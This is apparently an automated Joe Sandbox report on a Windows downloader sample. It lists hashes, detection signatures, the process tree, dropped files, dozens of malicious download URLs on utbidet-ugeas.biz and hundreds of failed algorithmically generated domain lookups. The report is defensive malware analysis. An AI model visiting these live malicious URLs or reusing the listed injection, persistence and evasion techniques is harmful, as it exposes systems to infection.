Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
YsyrcskNFK.exe

Overview

General Information

Sample name:YsyrcskNFK.exe
renamed because original name is a hash value
Original sample name:Virus.Injector.ATA_virussign.com_48916c39188d7a1ecd7618b9622d925c.exe
Analysis ID:1506040
MD5:48916c39188d7a1ecd7618b9622d925c
SHA1:5873e40607ae6b6ee543e08ae35bb473a3de06e8
SHA256:eface790b3a34fa4a326fe72b9df748380c3ae15c8d8bb929b4cb274445b233b
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Allocates memory in foreign processes
Contains functionality to check for running processes (XOR)
Creates an undocumented autostart registry key
Drops executables to the windows directory (C:\Windows) and starts them
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to resolve many domain names, but no domain seems valid
Writes to foreign memory regions
Connects to many different domains
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Executes massive DNS lookups (> 100)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • YsyrcskNFK.exe (PID: 6164 cmdline: "C:\Users\user\Desktop\YsyrcskNFK.exe" MD5: 48916C39188D7A1ECD7618B9622D925C)
    • anfidear.exe (PID: 6212 cmdline: "C:\Windows\system32\anfidear.exe" MD5: 48916C39188D7A1ECD7618B9622D925C)
      • anfidear.exe (PID: 6280 cmdline: --k33p MD5: 48916C39188D7A1ECD7618B9622D925C)
      • winlogon.exe (PID: 580 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
      • explorer.exe (PID: 4088 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
  • cleanup
No configs have been found
No yara matches
Source: Registry Key setAuthor: frack113: Data: Details: 9D 1D 2B 94 2A 01 DB 01 F4 D8 AB 33 00 00 00 00 32 00 , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\anfidear.exe, ProcessId: 6212, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy\Default Flags
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: YsyrcskNFK.exeAvira: detected
Source: http://utbidet-ugeas.biz/d/N?02EC71869EEC71869EDE71AA9EEC71A4C2F8954C0CEC71B0B0DE5FBFACDC41A89EAvira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?020C6411C80C6411C83E643DC80C6433941880DB5A0C6427E63E4A28FA3C543FC8Avira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?02C22D9D4EC22D9D4EF02DB14EC22DBF12D6C957DCC22DAB60F003A47CF21DB34EAvira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?028CE4BE0E8CE4BE0EBEE4920E8CE49C529800749C8CE48820BECA873CBCD4900EAvira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?020FD0EDC80FD0EDC83DD0C1C80FD0CF941B34275A0FD0DBE63DFED4FA3FE0C3C8Avira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?02F01E3F00F01E3F00C21E1300F01E1D5CE4FAF592F01E092EC2300632C02E1100Avira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?02D1AD1CC6D1AD1CC6E3AD30C6D1AD3E9AC549D654D1AD2AE8E38325F4E19D32C6Avira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?025C30053D5C30053D6E30293D5C30276148D4CFAF5C3033136E1E3C0F6C002B3DAvira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?02BE549BBBBE549BBB8C54B7BBBE54B9E7AAB05129BE54AD958C7AA2898E64B5BBAvira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?0298E2C40A98E2C40AAAE2E80A98E2E6568C060E9898E2F224AACCFD38A8D2EA0AAvira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?02ECA9A87AECA9A87ADEA9847AECA98A26F84D62E8ECA99E54DE879148DC99867AAvira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?02B2922A64B2922A6480920664B2920838A676E0F6B2921C4A80BC135682A20464Avira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?02357B2A20357B2A20077B0620357B087C219FE0B2357B1C0E07551312054B0420Avira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?02CCF84FD9CCF84FD9FEF863D9CCF86D85D81C854BCCF879F7FED676EBFCC861D9Avira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?02228A7717228A7717108A5B17228A554B366EBD85228A413910A44E2512BA5917Avira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?02F561B7A4F561B7A4C7619BA4F56195F8E1857D36F561818AC74F8E96C55199A4Avira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?02644F3816644F3816564F1416644F1A4A70ABF284644F0E3856610124547F1616Avira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?0208E0CC2308E0CC233AE0E02308E0EE7F1C0406B108E0FA0D3ACEF51138D0E223Avira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?022EFA15E32EFA15E31CFA39E32EFA37BF3A1EDF712EFA23CD1CD42CD11ECA3BE3Avira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?025DBFE07E5DBFE07E6FBFCC7E5DBFC222495B2AEC5DBFD6506F91D94C6D8FCE7EAvira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?02AA679484AA6794849867B884AA67B6D8BE835E16AA67A2AA9849ADB69A57BA84Avira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?02987A36F4987A36F4AA7A1AF4987A14A88C9EFC66987A00DAAA540FC6A84A18F4Avira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?024449ADAD4449ADAD764981AD44498FF150AD673F44499B837667949F747983ADAvira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?0226EE6A2826EE6A2814EE462826EE4874320AA0BA26EE5C0614C0531A16DE4428Avira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?028CF41BD68CF41BD6BEF437D68CF4398A9810D1448CF42DF8BEDA22E4BCC435D6Avira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?020AA6280F0AA6280F38A6040F0AA60A531E42E29D0AA61E213888113D3A96060FAvira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?0228989BB528989BB51A98B7B52898B9E93C7C51272898AD9B1AB6A28718A8B5B5Avira URL Cloud: Label: phishing
Source: C:\Windows\SysWOW64\oucradeam.dllAvira: detection malicious, Label: TR/Dldr.Agent.swim
Source: C:\Windows\SysWOW64\anfidear.exeAvira: detection malicious, Label: TR/Downloader.Gen
Source: C:\Users\user\AppData\Roaming\tmp5B02.tmpAvira: detection malicious, Label: TR/Downloader.Gen
Source: C:\Users\user\AppData\Roaming\cbofad-ugum.dllReversingLabs: Detection: 41%
Source: C:\Windows\SysWOW64\anfidear.exeReversingLabs: Detection: 86%
Source: C:\Windows\SysWOW64\oucradeam.dllReversingLabs: Detection: 34%
Source: YsyrcskNFK.exeReversingLabs: Detection: 86%
Source: YsyrcskNFK.exeVirustotal: Detection: 87%Perma Link
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Windows\SysWOW64\anfidear.exeJoe Sandbox ML: detected
Source: YsyrcskNFK.exeJoe Sandbox ML: detected
Source: YsyrcskNFK.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Networking

barindex
Source: unknownDNS traffic detected: query: accsccmowehao.tk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: xjqkpqooxtw.cg replaycode: Name error (3)
Source: unknownDNS traffic detected: query: uwqsqkc.rw replaycode: Name error (3)
Source: unknownDNS traffic detected: query: uamfoggxv.nu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: kugwdohdildom.cm replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qsopmlomcio.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: iussd.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: haenyxj.nu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: givyubk.cm replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ymrqaea.kr replaycode: Name error (3)
Source: unknownDNS traffic detected: query: yfqiwaiyiieva.nu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: xtmumoejcozau.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: nrzkjsqqhyn.nu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: osoiuss.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: bvqeqascgtwoe.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: oeics.nu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vwgsgxihg.rw replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ohpwkzyfepd.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: sysugqx.cm replaycode: Name error (3)
Source: unknownDNS traffic detected: query: sngakabudhw.kr replaycode: Name error (3)
Source: unknownDNS traffic detected: query: yrkaidc.rw replaycode: Name error (3)
Source: unknownDNS traffic detected: query: csrsmscor.kr replaycode: Name error (3)
Source: unknownDNS traffic detected: query: eykewokzuisiy.kr replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vhpidswja.nu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pryyadpsi.cm replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gcwsiuav.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: iycisbygfyc.tk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: aoyuutyfowm.tk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ixyogaqmz.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: wwyguweyegqlm.rw replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mydendkyepm.nu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: guagbcg.nu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: hympxmzhc.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: miadmzfsebr.nu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: aimnj.nu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: eicksugosskag.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mwscuidsbxwd.tk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: xbwkbyiqiweyg.tk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: icimpqqcmgitzw.rw replaycode: Name error (3)
Source: unknownDNS traffic detected: query: umhqmtssxmd.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: yoyiissqdwf.cm replaycode: Name error (3)
Source: unknownDNS traffic detected: query: sxoeffaiav.nu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: semqxvomsaiyc.cm replaycode: Name error (3)
Source: unknownDNS traffic detected: query: uzygawe.nu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: juosihwa.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ohplikpbqm.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: slrszlggkko.nu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: agwmw.nu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ilgsxg.cg replaycode: Name error (3)
Source: unknownDNS traffic detected: query: tkizdemkoeghk.rw replaycode: Name error (3)
Source: unknownDNS traffic detected: query: hlmwgkiqy.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: hmbdiekioov.tk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gxtuidxcei.kr replaycode: Name error (3)
Source: unknownDNS traffic detected: query: oooeuui.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: tviycvhycsg.rw replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lfdwova.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: wokyuems.cm replaycode: Name error (3)
Source: unknownDNS traffic detected: query: smquw.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: spcakqsti.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: yobikioonwei.rw replaycode: Name error (3)
Source: unknownDNS traffic detected: query: wgoevus.cm replaycode: Name error (3)
Source: unknownDNS traffic detected: query: skizcgujnggu.kr replaycode: Name error (3)
Source: unknownDNS traffic detected: query: kzagkogkm.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: icsxgkctc.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: wotywuy.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: kbrky.rw replaycode: Name error (3)
Source: unknownDNS traffic detected: query: unmomis.biz replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ayhkewtoowynm.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: swkcxqemkyy.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: hwithlztp.nu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qteqgagae.rw replaycode: Name error (3)
Source: unknownDNS traffic detected: query: uolgogccyd.nu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: eacpwc.nu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: twygkbwfadcb.nu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ffyqowyma.kr replaycode: Name error (3)
Source: unknownDNS traffic detected: query: itomvwhp.kr replaycode: Name error (3)
Source: unknownDNS traffic detected: query: cwfrm.cm replaycode: Name error (3)
Source: unknownDNS traffic detected: query: aoqszguyaujek.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: wabmtae.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ogwcidlpmupcnx.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: hfoxvuccsm.rw replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ygszuq.kr replaycode: Name error (3)
Source: unknownDNS traffic detected: query: icuryqispglav.nu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ygjcqkdytoovic.tk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: sjxrkruqiwx.nu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: uaaqyqcwqqcja.cm replaycode: Name error (3)
Source: unknownDNS traffic detected: query: aymaudvek.cg replaycode: Name error (3)
Source: unknownDNS traffic detected: query: cvhey.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: knwsifene.cm replaycode: Name error (3)
Source: unknownDNS traffic detected: query: saiooyzlabq.cg replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ywuycoq.rw replaycode: Name error (3)
Source: unknownDNS traffic detected: query: rioyquosq.cg replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pyytqfuq.nu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ymesqmmzqaq.kr replaycode: Name error (3)
Source: unknownDNS traffic detected: query: bmjueaufs.nu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: oqwktwc.cm replaycode: Name error (3)
Source: unknownDNS traffic detected: query: yezuwwdviwv.rw replaycode: Name error (3)
Source: unknownDNS traffic detected: query: keeaqsiaypyuh.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: uypqiuvvakueq.nu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: xcsyc.cg replaycode: Name error (3)
Source: unknownDNS traffic detected: query: bqzsz.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ykwmbwaahgx.tk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: oeceusfh.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: rpdsusinbkip.rw replaycode: Name error (3)
Source: unknownDNS traffic detected: query: isimmewo.cm replaycode: Name error (3)
Source: unknownDNS traffic detected: query: tcniociet.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: amaaiswmjmkuy.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ecwze.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: nqojfmslwe.nu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: msqqqkuote.kr replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ebysmjzss.kr replaycode: Name error (3)
Source: unknownDNS traffic detected: query: giacuxfzu.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: iayhpanmulmam.kr replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qjccwqk.rw replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gwrie.nu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pqbauaocat.rw replaycode: Name error (3)
Source: unknownDNS traffic detected: query: isfusus-omoab.biz replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gmespmwzeuf.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: dqkfw.rw replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gmgmjoksogmio.cg replaycode: Name error (3)
Source: unknownDNS traffic detected: query: wcuauomwf.cg replaycode: Name error (3)
Source: unknownDNS traffic detected: query: slqkcpaoigi.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ecwuuezii.kr replaycode: Name error (3)
Source: unknownDNS traffic detected: query: iagyhtrsme.nu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: cwmewmakbji.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: cygywai.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: uyargqkmysmey.kr replaycode: Name error (3)
Source: unknownDNS traffic detected: query: rrcucpyho.tk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: knssugh.cm replaycode: Name error (3)
Source: unknownDNS traffic detected: query: wmwiqhwgmqw.cg replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puupecdok.rw replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ilwsm.cg replaycode: Name error (3)
Source: unknownDNS traffic detected: query: uoswgwkemkmcc.kr replaycode: Name error (3)
Source: unknownDNS traffic detected: query: cewioqc.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: jmwqo.cm replaycode: Name error (3)
Source: unknownDNS traffic detected: query: eskgkmsahbgx.kr replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mgwew.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: soqywigqyan.rw replaycode: Name error (3)
Source: unknownDNS traffic detected: query: nvlmkgbaaikde.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qidxlsmgykakg.cg replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pocsr.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qmgdaeuaqkimy.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: saveljusy.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ntinscv.ph replaycode: Server failure (2)
Source: unknownDNS traffic detected: query: wjazfitj.tk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: wwjfjwkbe.rw replaycode: Name error (3)
Source: unknownDNS traffic detected: query: xegza.kr replaycode: Name error (3)
Source: unknownDNS traffic detected: query: woukmmo.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gzeefhmyfkwfdu.nu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: xcoryiiocfk.tk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mctaekjmuuq.rw replaycode: Name error (3)
Source: unknownDNS traffic detected: query: yehyukn.cg replaycode: Name error (3)
Source: unknownDNS traffic detected: query: skqyyvmwupvaz.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mxcsyru.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: swgegyqvcituc.cg replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ckgewowedw.nu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: uikbs.cm replaycode: Name error (3)
Source: unknownDNS traffic detected: query: sucqey.tk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ajhywlykcqekg.cm replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ezgapahxw.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ckkwm.kr replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ekctlbk.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qpaqgmagijd.tk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: bgadyrzznoyrc.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: zebrkabdqmc.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: quggjasqaojen.nu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: wzwiueugcwo.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qfgsihuk.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qmyiycz.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lkfor.cm replaycode: Name error (3)
Source: unknownDNS traffic detected: query: suqjayddo.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: zsuli.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: hgeticnca.cg replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lecieceknom.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: jcuccup.tk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: yqymasgdwtbek.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: fgssdjwvyfa.kr replaycode: Name error (3)
Source: unknownDNS traffic detected: query: wywseqghowg.nu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: iestfjbodxvgi.rw replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ajyswracs.rw replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qkyaaqptlliqy.cg replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vllttyuji.cm replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qnfqcqeya.cm replaycode: Name error (3)
Source: unknownDNS traffic detected: query: rwmjwroq.ph replaycode: Server failure (2)
Source: unknownDNS traffic detected: query: qqrsykcalst.nu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ncjwytiai.rw replaycode: Name error (3)
Source: unknownDNS traffic detected: query: uwuxiskxiq.kr replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pakgv.cm replaycode: Name error (3)
Source: unknownDNS traffic detected: query: jkoxgki.cm replaycode: Name error (3)
Source: unknownDNS traffic detected: query: yxgicufjvaq.cg replaycode: Name error (3)
Source: unknownDNS traffic detected: query: upwmm.cm replaycode: Name error (3)
Source: unknownDNS traffic detected: query: wwwxruiqiwwui.cg replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qssjkviqegq.tk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: nkybaqmk.nu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: esqdmcu.tk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: omspgieam.tk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lczyerqngqyyw.cm replaycode: Name error (3)
Source: unknownDNS traffic detected: query: wbisbwimhhhup.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: oiyjuwpfrwm.cg replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qpqqbqlxrg.rw replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qwuikiryt.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vavzsrskk.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: uqeqghuugsvu.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qsiweimlofr.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: resmiwgzvok.tk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: wnocrmqhv.rw replaycode: Name error (3)
Source: unknownDNS traffic detected: query: yvkykeqbywnf.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ydyczugi.cm replaycode: Name error (3)
Source: unknownDNS traffic detected: query: cgtgpeqgmorej.rw replaycode: Name error (3)
Source: unknownDNS traffic detected: query: yxilgkywg.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qywresbs.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gduug.cm replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pnpabkjjdjmoh.rw replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ieozc.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: redxddu.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: imkhxwgiovl.tk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: kgskfwu.tk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: zkbftoqb.kr replaycode: Name error (3)
Source: unknownDNS traffic detected: query: snmwltwzodi.kr replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ekmik.cm replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ezmjagulq.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: wcwmvlwgg.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: oygxiuecuvg.rw replaycode: Name error (3)
Source: unknownDNS traffic detected: query: fcrgsmyjqqmgw.nu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mqrcyvcvqnw.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: oskplo.kr replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qdeekxfwxqwwio.cm replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ucdugwi.kr replaycode: Name error (3)
Source: unknownDNS traffic detected: query: nymuqze.rw replaycode: Name error (3)
Source: unknownDNS traffic detected: query: oomoyklkajgl.tk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: uqiheoqaqgoe.cg replaycode: Name error (3)
Source: unknownDNS traffic detected: query: euiyqou.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gowravdyagf.tk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: seovkg.kr replaycode: Name error (3)
Source: unknownDNS traffic detected: query: boresaucqwsns.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: knjicci.tk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: cunyqsqr.nu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: swgmuxkigyz.cg replaycode: Name error (3)
Source: unknownDNS traffic detected: query: suiquqqgreg.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ivygbfoqj.rw replaycode: Name error (3)
Source: unknownDNS traffic detected: query: aomlcfimik.kr replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ickoadgsoyohk.rw replaycode: Name error (3)
Source: unknownDNS traffic detected: query: iukvug.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: awgeqiq.nu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: iqytgazreom.tk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: dhxrlnwcopmk.tk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ifoyxx.tk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: beugefkah.rw replaycode: Name error (3)
Source: unknownDNS traffic detected: query: uilghhpmueun.cm replaycode: Name error (3)
Source: unknownDNS traffic detected: query: fdcjgqsraedu.cg replaycode: Name error (3)
Source: unknownDNS traffic detected: query: siosbpgeiahyu.kr replaycode: Name error (3)
Source: unknownDNS traffic detected: query: uuymqeexwuvmc.cm replaycode: Name error (3)
Source: unknownDNS traffic detected: query: tmmeurejeikav.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: avvooma.kr replaycode: Name error (3)
Source: unknownDNS traffic detected: query: yqnirusysaj.kr replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ktogxvlkiikq.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: unieemichmmsj.tk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ilmic.kr replaycode: Name error (3)
Source: unknownDNS traffic detected: query: weyagk.rw replaycode: Name error (3)
Source: unknownDNS traffic detected: query: jmkxaicazxych.rw replaycode: Name error (3)
Source: unknownDNS traffic detected: query: epcpawkywhm.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qwremcmjnq.rw replaycode: Name error (3)
Source: unknownDNS traffic detected: query: uwyojch.cm replaycode: Name error (3)
Source: unknownDNS traffic detected: query: obzal.cm replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ceyvmvcmh.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mdworuiagzuyu.cg replaycode: Name error (3)
Source: unknownDNS traffic detected: query: orksc.rw replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ivazy.tk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: wzaukej.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: yjzdwbmrwqqceb.st replaycode: Name error (3)
